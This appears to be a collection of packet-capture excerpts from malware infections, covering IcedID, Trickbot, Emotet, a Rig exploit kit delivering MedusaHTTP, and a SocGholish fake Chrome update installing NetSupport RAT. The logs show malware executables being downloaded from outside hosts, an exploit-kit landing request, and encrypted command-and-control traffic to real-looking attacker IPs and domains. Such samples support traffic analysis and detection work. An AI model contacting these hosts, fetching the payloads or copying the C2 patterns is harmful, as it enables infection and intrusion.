Text Example

IcedID and Trickbot banking malware trojan downloader/dropper: PCAP file download traffic sample

2019-08-12 14:04:16.655885 IP 10.8.12.101.49224 > 179.60.144.143.443: Flags [P.], seq 1:119, ack 1, win 64240, length 118
2019-08-12 14:04:16.655968 IP 179.60.144.143.443 > 10.8.12.101.49224: Flags [.], ack 119, win 64240, length 0
2019-08-12 14:04:16.841099 IP 179.60.144.143.443 > 10.8.12.101.49224: Flags [P.], seq 1:810, ack 119, win 64240, length 809

2019-08-12 14:04:22.653444 IP 10.8.12.101.49226 > 107.173.90.141.80: Flags [P.], seq 1:79, ack 1, win 64240, length 78: HTTP: GET /SWKLPFVBDS.exe HTTP/1.1
GET /SWKLPFVBDS.exe HTTP/1.1
Connection: Keep-Alive
Host: 107.173.90.141

2019-08-12 14:04:22.653480 IP 107.173.90.141.80 > 10.8.12.101.49226: Flags [.], ack 79, win 64240, length 0
2019-08-12 14:04:22.653825 IP 107.173.90.141.80 > 10.8.12.101.49227: Flags [S.], seq 1652259580, ack 1389350972, win 64240, options [mss 1460], length 0
2019-08-12 14:04:22.653923 IP 10.8.12.101.49227 > 107.173.90.141.80: Flags [.], ack 1, win 64240, length 0
IP 10.8.12.101.49227 > 107.173.90.141.80: Flags [P.], seq 1:74, ack 1, win 64240, length 73: HTTP: GET /Tin64.exe HTTP/1.1
GET /Tin64.exe HTTP/1.1
Connection: Keep-Alive
Host: 107.173.90.141

2019-08-12 14:04:22.654025 IP 107.173.90.141.80 > 10.8.12.101.49227: Flags [.], ack 74, win 64240, length 0
2019-08-12 14:04:22.658025 IP 107.173.90.141.80 > 10.8.12.101.49228: Flags [S.], seq 848954188, ack 3386416125, win 64240, options [mss 1460], length 0
2019-08-12 14:04:22.658306 IP 10.8.12.101.49228 > 107.173.90.141.80: Flags [.], ack 1, win 64240, length 0
2019-08-12 14:04:22.658387 IP 10.8.12.101.49228 > 107.173.90.141.80: Flags [P.], seq 1:72, ack 1, win 64240, length 71: HTTP: GET /tin.exe HTTP/1.1
GET /tin.exe HTTP/1.1
Connection: Keep-Alive
Host: 107.173.90.141

2019-08-12 14:04:22.658419 IP 107.173.90.141.80 > 10.8.12.101.49228: Flags [.], ack 72, win 64240, length 0
2019-08-12 14:04:22.658818 IP 107.173.90.141.80 > 10.8.12.101.49229: Flags [S.], seq 2043162382, ack 4219249562, win 64240, options [mss 1460], length 0
2019-08-12 14:04:22.658925 IP 10.8.12.101.49229 > 107.173.90.141.80: Flags [.], ack 1, win 64240, length 0
2019-08-12 14:04:22.659036 IP 10.8.12.101.49229 > 107.173.90.141.80: Flags [P.], seq 1:74, ack 1, win 64240, length 73: HTTP: GET /Tin86.exe HTTP/1.1
GET /Tin86.exe HTTP/1.1
Connection: Keep-Alive
Host: 107.173.90.141

2019-08-12 14:04:22.783970 IP 107.173.90.141.80 > 10.8.12.101.49229: Flags [.], seq 21901:23361, ack 74, win 64240, length 1460: HTTP
2019-08-12 14:04:22.783982 IP 107.173.90.141.80 > 10.8.12.101.49229: Flags [.], seq 23361:24821, ack 74, win 64240, length 1460: HTTP
2019-08-12 14:04:22.783983 IP 10.8.12.101.49227 > 107.173.90.141.80: Flags [.], ack 32121, win 64240, length 0
2019-08-12 14:04:22.783993 IP 107.173.90.141.80 > 10.8.12.101.49229: Flags [P.], seq 24821:26281, ack 74, win 64240, length 1460: HTTP

2019-08-12 14:14:56.835089 IP 10.8.12.2.60171 > 185.183.96.213.443: Flags [P.], seq 4809:6269, ack 1931, win 65535, length 1460
2019-08-12 14:14:56.835150 IP 185.183.96.213.443 > 10.8.12.2.60171: Flags [.], ack 6269, win 64240, length 0
2019-08-12 14:14:56.835172 IP 10.8.12.2.60172 > 185.70.40.151.443: Flags [.], ack 6825, win 65535, length 0
2019-08-12 14:14:56.835251 IP 10.8.12.2.60171 > 185.183.96.213.443: Flags [P.], seq 6269:6896, ack 1931, win 65535, length 627
2019-08-12 14:14:56.835276 IP 185.183.96.213.443 > 10.8.12.2.60171: Flags [.], ack 6896, win 64240, length 0
2019-08-12 14:14:57.185963 IP 185.183.96.213.443 > 10.8.12.2.60171: Flags [FP.], seq 1931, ack 6896, win 64240, length 0
2019-08-12 14:14:57.186113 IP 10.8.12.2.60171 > 185.183.96.213.443: Flags [.], ack 1932, win 65535, length 0
2019-08-12 14:14:57.186214 IP 10.8.12.2.60172 > 185.70.40.151.443: Flags [F.], seq 1905, ack 6825, win 65535, length 0
2019-08-12 14:14:57.186317 IP 185.70.40.151.443 > 10.8.12.2.60172: Flags [.], ack 1906, win 64239, length 0
2019-08-12 14:14:57.331011 IP 185.183.96.213.443 > 10.8.12.2.59830: Flags [P.], seq 782:827, ack 80, win 64240, length 45
2019-08-12 14:14:57.331471 IP 10.8.12.2.60174 > 185.183.96.213.443: Flags [S], seq 1476129128, win 65535, options [mss 1460,nop,wscale 4,nop,nop,sackOK], length 0

Rig Exploit Kit (EK) loads MedusaHTTP malware trojan backdoor via Flash exploit: PCAP file download traffic sample

2019-08-12 16:57:48.518525 IP 10.8.12.101.49158 > 188.225.37.115.80: Flags [P.], seq 1:737, ack 1, win 64240, length 736: HTTP: GET /?ODE2NTA=&aAxgMQgI&fhoaCukK=difference&ZVWHUl=heartfelt&GpNuBWSc=strategy&GuxiOH=already&IhrRqTdNT=heartfelt&PoKpUSKLK=golfer&wZzWF=perpetual&OAGiuQ=community&EIYoYThI=heartfelt&rClHTGxUX=community&tqqvPaqsy=constitution&lJHtbzKVC=wrapped&tUkJD=wrapped&cmYxKg=referred&ffhdtdf3s=xHjQMrfYbRfFFYrfKPPEUKNEMUnWA06KwYeZhajVF5mxFDHGpbv1FxTspVWdCFSEmvpvdLUHIwWh1UPA&zUugkiAM=detonator&t4gdfgdgf4=SwMzmIZdB1wb8K742kfSyRHIgp_T-BKPYwxB-JqTQbZvjVqkmbhHd8JyxBCB72kGzuMtYlwgpQxR2afI&NCXtqqIJMzUwNDg0 HTTP/1.1
GET /?ODE2NTA=&aAxgMQgI&fhoaCukK=difference&ZVWHUl=heartfelt&GpNuBWSc=strategy&GuxiOH=already&IhrRqTdNT=heartfelt&PoKpUSKLK=golfer&wZzWF=perpetual&OAGiuQ=community&EIYoYThI=heartfelt&rClHTGxUX=community&tqqvPaqsy=constitution&lJHtbzKVC=wrapped&tUkJD=wrapped&cmYxKg=referred&ffhdtdf3s=xHjQMrfYbRfFFYrfKPPEUKNEMUnWA06KwYeZhajVF5mxFDHGpbv1FxTspVWdCFSEmvpvdLUHIwWh1UPA&zUugkiAM=detonator&t4gdfgdgf4=SwMzmIZdB1wb8K742kfSyRHIgp_T-BKPYwxB-JqTQbZvjVqkmbhHd8JyxBCB72kGzuMtYlwgpQxR2afI&NCXtqqIJMzUwNDg0 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 188.225.37.115
Connection: Keep-Alive

2019-08-12 16:57:48.518651 IP 188.225.37.115.80 > 10.8.12.101.49158: Flags [.], ack 737, win 64240, length 0
2019-08-12 16:57:49.127786 IP 188.225.37.115.80 > 10.8.12.101.49158: Flags [P.], seq 1:1277, ack 737, win 64240, length 1276: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Mon, 12 Aug 2019 20:57:46 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 45973
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip

2019-08-12 16:59:38.271526 IP 10.8.12.101.49167 > 176.119.29.14.80: Flags [P.], seq 1:269, ack 1, win 64240, length 268: HTTP: POST /forums/members/api.jsp HTTP/1.1
POST /forums/members/api.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Host: cdnshop78.world
Content-Length: 192
Expect: 100-continue
Connection: Keep-Alive

2019-08-12 16:59:38.271686 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [.], ack 269, win 64240, length 0
2019-08-12 16:59:38.626952 IP 10.8.12.101.49167 > 176.119.29.14.80: Flags [P.], seq 269:461, ack 1, win 64240, length 192: HTTP
xyz=Jn72I3lUOoD6/K%2BBOVBU21CCWaMR0pT/MMMybhkcYzKf0Fxhd5iX/gM81s2/ry7/68WwIwZcdWQ6itJCp/2EjmcHZrxDMiwaQmK6aOtIdjcivuIb26kGZv0gTBGSgrc2LVstLUlWLVstMl4VcmXCxtXRM%2Bb999Q62gnpsw9gRcO404kDv36jb7g=
2019-08-12 16:59:38.627077 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [.], ack 461, win 64240, length 0
2019-08-12 16:59:38.701682 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [P.], seq 1:26, ack 461, win 64240, length 25: HTTP: HTTP/1.1 100 Continue
HTTP/1.1 100 Continue

2019-08-12 16:59:38.807386 IP 10.8.12.101.49167 > 176.119.29.14.80: Flags [.], ack 26, win 64215, length 0
2019-08-12 16:59:39.444787 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [P.], seq 26:381, ack 461, win 64240, length 355: HTTP: HTTP/1.1 404 Not Found
HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 13 Aug 2019 00:59:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.39

2019-08-12 18:02:50.728872 IP 10.8.12.101.49205 > 195.22.26.248.80: Flags [P.], seq 246:434, ack 26, win 64215, length 188: HTTP
xyz=Rdbf7Sz9YfcZXmTqimFyqnuXh9Qh2EokgRxWjlW6eKlVYMP/0Ie66coOHRDqh72wYWFpR4xyzrqwauM0ArlQyO1qB/flAxIl7E5s3wAGYyWQvmPGYIc2JkmQEzK0NIxSLVstLUlWLVst5B2FNeT80ZFfKTucqMUWcv06uvZYrUmVLNhFF/hGmbs=
2019-08-12 18:02:50.729083 IP 195.22.26.248.80 > 10.8.12.101.49205: Flags [.], ack 434, win 64240, length 0
2019-08-12 18:02:50.900794 IP 195.22.26.248.80 > 10.8.12.101.49205: Flags [FP.], seq 26:283, ack 434, win 64240, length 257: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Aug 2019 22:02:47 GMT
Content-Type: text/html
Connection: close
Set-Cookie: btst=98d119f0da644d3d3e6a3eec09296b9b|173.166.146.112|1565647367|1565647367|0|1|0; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT

Fake Google Chrome update download (SocGholish campaign) loads NetSupport RAT: PCAP file download traffic sample

2019-08-26 15:03:01.209093 IP 10.8.26.101.51807 > 10.8.26.1.53: 44756+ A? mysocalledchaos.com. (37)

2019-08-26 15:03:01.353045 IP 10.8.26.101.49163 > 166.62.111.64.80: Flags [P.], seq 1:409, ack 1, win 256, length 408: HTTP: GET / HTTP/1.1
GET / HTTP/1.1
Host: mysocalledchaos.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: en

2019-08-26 15:03:39.075406 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [P.], seq 17917:19120, ack 14190, win 451, length 1203: HTTP

2019-08-26 15:03:39.075745 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [.], ack 19120, win 256, length 0
2019-08-26 15:03:39.168023 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [.], seq 19120:20580, ack 14190, win 451, length 1460: HTTP
2019-08-26 15:03:39.168037 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [.], seq 20580:22040, ack 14190, win 451, length 1460: HTTP
2019-08-26 15:03:39.168042 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [P.], seq 22040:23224, ack 14190, win 451, length 1184: HTTP

2019-08-26 15:03:39.168046 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [.], seq 23224:24684, ack 14190, win 451, length 1460: HTTP

2019-08-26 15:04:18.005975 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [.], ack 8959766, win 3626, length 0
2019-08-26 15:04:18.016420 IP 93.95.100.178.80 > 10.8.26.101.49204: Flags [F.], seq 13215, ack 336, win 473, length 0
2019-08-26 15:04:18.016640 IP 10.8.26.101.49204 > 93.95.100.178.80: Flags [.], ack 13216, win 256, length 0
2019-08-26 15:04:18.037966 IP 93.95.100.178.80 > 10.8.26.101.49205: Flags [F.], seq 6011, ack 365, win 473, length 0
2019-08-26 15:04:18.038169 IP 10.8.26.101.49205 > 93.95.100.178.80: Flags [.], ack 6012, win 256, length 0
2019-08-26 15:04:18.051835 IP 93.95.100.178.80 > 10.8.26.101.49206: Flags [F.], seq 343, ack 408, win 473, length 0
2019-08-26 15:04:18.052044 IP 10.8.26.101.49206 > 93.95.100.178.80: Flags [.], ack 344, win 255, length 0
2019-08-26 15:04:18.568546 IP 93.95.100.178.80 > 10.8.26.101.49207: Flags [F.], seq 16499, ack 424, win 473, length 0
2019-08-26 15:04:18.568555 IP 93.95.100.178.80 > 10.8.26.101.49209: Flags [F.], seq 16623, ack 424, win 473, length 0
2019-08-26 15:04:18.568559 IP 93.95.100.178.80 > 10.8.26.101.49208: Flags [F.], seq 15919, ack 424, win 473, length 0
2019-08-26 15:04:18.568563 IP 93.95.100.178.80 > 10.8.26.101.49210: Flags [F.], seq 16511, ack 424, win 473, length 0
2019-08-26 15:04:18.568814 IP 10.8.26.101.49207 > 93.95.100.178.80: Flags [.], ack 16500, win 256, length 0
2019-08-26 15:04:18.568842 IP 10.8.26.101.49209 > 93.95.100.178.80: Flags [.], ack 16624, win 256, length 0
2019-08-26 15:04:18.568850 IP 10.8.26.101.49208 > 93.95.100.178.80: Flags [.], ack 15920, win 256, length 0
2019-08-26 15:04:18.568856 IP 10.8.26.101.49210 > 93.95.100.178.80: Flags [.], ack 16512, win 256, length 0
2019-08-26 15:04:19.288443 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [P.], seq 3947:3986, ack 89439, win 821, length 39
2019-08-26 15:04:19.288452 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [F.], seq 3986, ack 89439, win 821, length 0
2019-08-26 15:04:19.288696 IP 10.8.26.101.49200 > 31.13.93.35.443: Flags [.], ack 3987, win 253, length 0
2019-08-26 15:04:19.288940 IP 10.8.26.101.49200 > 31.13.93.35.443: Flags [F.], seq 89439, ack 3987, win 253, length 0
2019-08-26 15:04:19.289444 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [F.], seq 3986, ack 89439, win 821, length 0
2019-08-26 15:04:19.302333 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [.], ack 89440, win 821, length 0
2019-08-26 15:04:19.967401 IP 10.8.26.101.49216 > 62.172.138.35.80: Flags [P.], seq 1:119, ack 1, win 258, length 118: HTTP: GET /location/loca.asp HTTP/1.1
GET /location/loca.asp HTTP/1.1
Host: geo.netsupportsoftware.com
Connection: Keep-Alive
Cache-Control: no-cache

2019-08-26 15:04:20.126241 IP 179.43.146.90.443 > 10.8.26.101.49215: Flags [P.], seq 215:521, ack 655, win 254, length 306
HTTP/1.1 200 OK
Server: NetSupport Gateway/1.6 (Windows NT)
Content-Type: application/x-www-form-urlencoded
Content-Length: 152
Connection: Keep-Alive

CMD=ENCD
ES=1
DATA=u.2h.r.. .…W.h.E..=I….=n~…….7s.4…}.X…),.,.Dq.,…..()4.]..%y-A9H=n .:!…b<D…c…)=@UX.u….8+.t_A…R..b..’h[.T…jI

2019-08-26 15:04:20.134779 IP 62.172.138.35.80 > 10.8.26.101.49216: Flags [P.], seq 1:276, ack 119, win 258, length 275: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/10.0
Access-Control-Allow-Origin: *
Set-Cookie: ASPSESSIONIDSQTTAQAS=JMCCAGKBFCGMCLKBAJJGPDLL; path=/
X-Powered-By: ASP.NET
Date: Mon, 26 Aug 2019 19:04:18 GMT
Content-Length: 1

,
2019-08-26 15:04:20.135084 IP 10.8.26.101.49216 > 62.172.138.35.80: Flags [.], ack 276, win 257, length 0
2019-08-26 15:04:20.327276 IP 10.8.26.101.49215 > 179.43.146.90.443: Flags [P.], seq 655:927, ack 521, win 258, length 272
POST http://179.43.146.90/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 179.43.146.90
Connection: Keep-Alive

CMD=ENCD
ES=1
DATA=l3.<(T{.E…..V….k.9|||$(m..$Cj_……..0Mt..s…M.6..

2019-08-26 15:04:20.570080 IP 179.43.146.90.443 > 10.8.26.101.49215: Flags [.], ack 927, win 253, length 0
2019-08-26 15:04:20.627030 IP 10.8.26.101.137 > 10.8.26.255.137: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
2019-08-26 15:04:20.675976 IP 10.8.26.101.137 > 10.8.26.255.137: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
2019-08-26 15:04:20.727322 IP 10.8.26.101.49215 > 179.43.146.90.443: Flags [P.], seq 927:1217, ack 521, win 258, length 290
POST http://179.43.146.90/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
Host: 179.43.146.90

2019-08-26 15:04:26.662060 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [.], ack 8960053, win 3624, length 0
2019-08-26 15:04:30.427725 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [P.], seq 409336:409766, ack 8960053, win 3624, length 430: HTTP: POST /1x1.gif?ss&ss2img HTTP/1.1
POST /1x1.gif?ss&ss2img HTTP/1.1
Accept: */*
Accept-Language: en-us
Age: a17316821ea1038c
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 979879f9.user3.altcoinfan.com
Content-Length: 385714
Connection: Keep-Alive
Cache-Control: no-cache

2019-08-26 15:03:01.423467 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 468
2019-08-26 15:03:01.423995 IP 10.8.26.101.51808 > 172.217.1.141.443: UDP, length 1010
2019-08-26 15:03:01.472993 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28
2019-08-26 15:03:01.473493 IP 10.8.26.101.51808 > 172.217.1.141.443: UDP, length 28
2019-08-26 15:03:01.504670 IP 10.8.26.101.51808 > 172.217.1.141.443: UDP, length 28
2019-08-26 15:03:01.528689 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 254
2019-08-26 15:03:01.573710 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28
2019-08-26 15:03:01.576544 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 337
2019-08-26 15:03:01.625002 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28
2019-08-26 15:03:01.802524 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 247
2019-08-26 15:03:01.849036 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28
2019-08-26 15:03:03.418784 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
2019-08-26 15:03:03.421675 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
2019-08-26 15:03:03.421733 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8..@…..
..e.. ……$?A@M…..K?..?w....}...N=..5. 2019-08-26 15:03:03.421795 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8..@..... ..e.. ......$.^@M.....K?.|.2.\9..g.9..]...7 2019-08-26 15:03:03.422363 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8..@..... ..e.. ......$..@M.....K?...J...T.J.pU.].... 2019-08-26 15:03:03.422395 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8..@..... ..e.. ......$ab@M.....K?.j.U..aAm..*.5%._Z. 2019-08-26 15:03:03.424121 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8..@..... ..e.. ......$p.@M.....K?..X+O.Ts.L..9:..M.. 2019-08-26 15:03:03.424206 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8. @..... ..e.. ......$..@M.....K?.}..j...!.@.z.Du..9 2019-08-26 15:03:03.424444 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.!@..... ..e.. ......$..@M.....K?.......B#...._MC}.h 2019-08-26 15:03:03.435279 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.H@..... ..e.. ......$4O@M.....K?....P0.&..%.M..9*Y. 2019-08-26 15:03:03.435326 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.I@..... ..e.. ......$..@M.....K?...,.OJ.......9uP4. 2019-08-26 15:03:03.435397 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.J@..... ..e.. ......$I.@M.....K?..*.v.#^.R...[~.RR. 2019-08-26 15:03:03.435469 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.K@..... ..e.. ......$a.@M.....K?....J.G.... ..c...k 2019-08-26 15:03:03.435540 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.L@..... ..e.. ......$;@@M.....K?..."h.A...1....&... 2019-08-26 15:03:03.448683 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 41 E..E.T@..... ..e.. ......1..@M.....K?.).R.8:.'.k....k.-..6....g=.G_.. 2019-08-26 15:03:03.448737 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.W@..... ..e.. ......$|.@M.....K?....F. .h."........ 2019-08-26 15:03:03.541893 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 296 E..D..@..... ..e.. 
..7...0Q.@:..k..$b..>^n;".. s..Hf:T>.....W....."... ..a.#8.a..X'B..-....a.=.6..m".7.2..^ /..aA.!N... 4F..M...SJ<.F....+h...IRy5..J.B....!!ME....]Z.
..x..C.a.."Q.1..V....Bb:.;)w.(.n..[...r*}~..gM.^......7T.fm...s.."....$....6..L..i.d....~.u7D~.>.m0d.M..$.iX..y.......},.Z).a.w;j.. &.M.tb..9k.?.Kn+..IE1\'
2019-08-26 15:03:03.575606 IP 10.8.26.101.64439 > 172.217.9.142.443: UDP, length 1350
E..b..@.....
..e.. ......N...Q046P....2..x.... ...............CHLO....PAD.....SNI.....VER.....CCS.....UAID(...TCID,...PDMD0...SMHL4...ICSL8...NONPX...MIDS...SCLS...CSCT...COPTd...IRTTh...CFCWl...SFCWp...----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------www.google-analytics.comQ046.......~.......Chrome/76.0.3809.132 Windows NT 6.1; Win64; x64....X509........l..Y]..@T.]...W.....E.+...Zk^.o"d.......NSTP.w....................................................................................................................................................................................................................................................................

Emotet Banking Trojan and Trickbot Malware Traffic Sample infection w/Spambot Noise PCAP file Download

2019-09-18 13:32:22.678529 IP 10.9.18.101.49160 > 124.158.6.218.80: Flags [P.], seq 4191540612:4191540891, ack 2860101733, win 64240, length 279: HTTP: GET /wp-admin/n2keep7/ HTTP/1.1
E..?..@...Y1
.e|......P.....y.eP...Y...GET /wp-admin/n2keep7/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: thinhvuongmedia.com
DNT: 1
Connection: Keep-Alive

2019-09-18 13:32:22.942838 IP 124.158.6.218.80 > 10.9.18.101.49160: Flags [P.], seq 1:1277, ack 279, win 64240, length 1276: HTTP: HTTP/1.1 200 OK
E..$T.....A.|...
.e.P...y.e....P.......HTTP/1.1 200 OK
Date: Wed, 18 Sep 2019 17:26:02 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.33
X-Powered-By: PHP/5.6.33
Set-Cookie: 5d8268aa1193f=1568827562; expires=Wed, 18-Sep-2019 17:27:02 GMT; Max-Age=60; path=/
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 18 Sep 2019 17:26:02 GMT
Expires: Wed, 18 Sep 2019 17:26:02 GMT
Content-Disposition: attachment; filename="i5pv72yr.exe"
Content-Transfer-Encoding: binary
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload

2019-09-18 13:33:30.627377 IP 10.9.18.101.49165 > 66.228.32.31.443: Flags [P.], seq 3657721627:3657721896, ack 2496123025, win 64240, length 269
E..5..@...vV
.eB. .......g.....P..."...GET /whoami.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 66.228.32.31:443
Cache-Control: no-cache

2019-09-18 13:33:30.669920 IP 10.9.18.101.49164 > 189.129.4.186.80: Flags [P.], seq 899:1832, ack 2600252, win 63022, length 933: HTTP: POST /rtm/symbols/ HTTP/1.1
E.....@.....
.e.......Pr..G..^.P.......POST /rtm/symbols/ HTTP/1.1
Referer: http://189.129.4.186/rtm/symbols/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 189.129.4.186
Content-Length: 518
Connection: Keep-Alive
Cache-Control: no-cache

6ll8i995327yEb1qC=SbbKQbNltyr7OEcfzxrUQ304Q2%2FW6l5R9lo%2B5pVxib%2FIt4w3Sjeay5KbFubuIws4O0t7iA%2FTTdyiyRHbY7ySX3cga1z4cQuduITiXM9R5e7rTet9Uod5fFGxgh4JKFGS5n1sQ2TqoRhHBRx7cyBqBFIuag5dqUNeimMgsfRfYiwz39hBgErZ2D0Phl7Y6pFo%2BgASm3UxQKPwVMO8ux4AN2qvVtS2pEQ1HZZcDFci1m1YUNPlvgGhz6Gdpiiz2nZ%2Fr4fpHEK8spNliNSciLGdp7XKmD3rkLzPW5Y2Gm6J0PHywumZH0hJryQUQdwGmeWY8LiNcnQW4bRzxcA%2FSgIA0B8peygnfyCIwigVnD%2FwUBRRFjTCh5crDpm86cA9sZx1tnMgWbVF3cyJLDXvAkyYI%2B9IReYi9WIMTYjpUuPBxEm5zYaLYolpypw07kquVeRU5xXpSD3wp4D7w%2BmBFphGa1%2FKfn4%3D
2019-09-18 13:33:30.713609 IP 10.9.18.101.49166 > 104.236.185.25.8080: Flags [P.], seq 1031397366:1031397638, ack 3231780717, win 64240, length 272: HTTP: GET /whoami.php HTTP/1.1
E..8..@....K
.eh.......=y.....mP.......GET /whoami.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 104.236.185.25:8080
Cache-Control: no-cache

2019-09-18 13:33:30.722484 IP 10.9.18.101.49167 > 104.236.185.25.8080: Flags [P.], seq 2799073531:2799073803, ack 2887398240, win 64240, length 272: HTTP: GET /whoami.php HTTP/1.1
E..8..@....I
.eh.........x...3`P.......GET /whoami.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 104.236.185.25:8080
Cache-Control: no-cache

2019-09-18 13:33:31.019952 IP 66.228.32.31.443 > 10.9.18.101.49165: Flags [P.], seq 1:211, ack 269, win 64240, length 210
E...].....].B. .
.e..........h(P....P..HTTP/1.1 200 OK
Server: nginx
Date: Wed, 18 Sep 2019 17:33:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding

e
173.66.146.112
0

2019-09-18 13:33:31.096777 IP 189.129.4.186.80 > 10.9.18.101.49164: Flags [P.], seq 2600252:2600556, ack 1832, win 64240, length 304: HTTP: HTTP/1.1 200 OK
E..X]......p....
.e.P....^.r.!.P.......HTTP/1.1 200 OK
Server: nginx
Date: Wed, 18 Sep 2019 17:33:30 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 148
Connection: keep-alive

